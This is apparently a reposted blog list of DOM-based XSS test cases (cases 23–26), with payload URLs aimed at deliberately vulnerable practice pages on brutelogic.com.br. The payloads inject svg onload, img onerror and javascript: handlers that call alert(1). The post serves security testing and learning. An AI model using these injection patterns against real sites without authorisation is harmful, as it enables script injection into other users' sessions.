DOM-based XSS Test Cases
Case 23 - DOM Injection via URL parameter (by server + client)
https://brutelogic.com.br/dom/dom.php?p=Hello.<svg onload=alert(1)>
https://brutelogic.com.br/dom/dom.php?p=<img src=x onerror=alert(1)>
Case 24 - DOM Injection via URL Parameter (Document Sink)
https://brutelogic.com.br/dom/sinks.html?name=KNOXSS'<svg onload=alert(1)>
https://brutelogic.com.br/dom/sinks.html?name=<img src=x onerror=alert(1)>
Case 25 - DOM Injection via Open Redirection (Location Sink)
https://brutelogic.com.br/dom/sinks.html?redir=javascript:alert(1)
Case 26 - DOM Injection via URL Parameter (Execution Sink)
https://brutelogic.com.br/dom/sinks.html?index='NASDAQ<svg onload=alert(1)>'
https://brutelogic.com.br/dom/sinks.html?index='NASDAQ';alert(1);
参考:
https://brutelogic.com.br/knoxss.html
https://xz.aliyun.com/t/4283
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步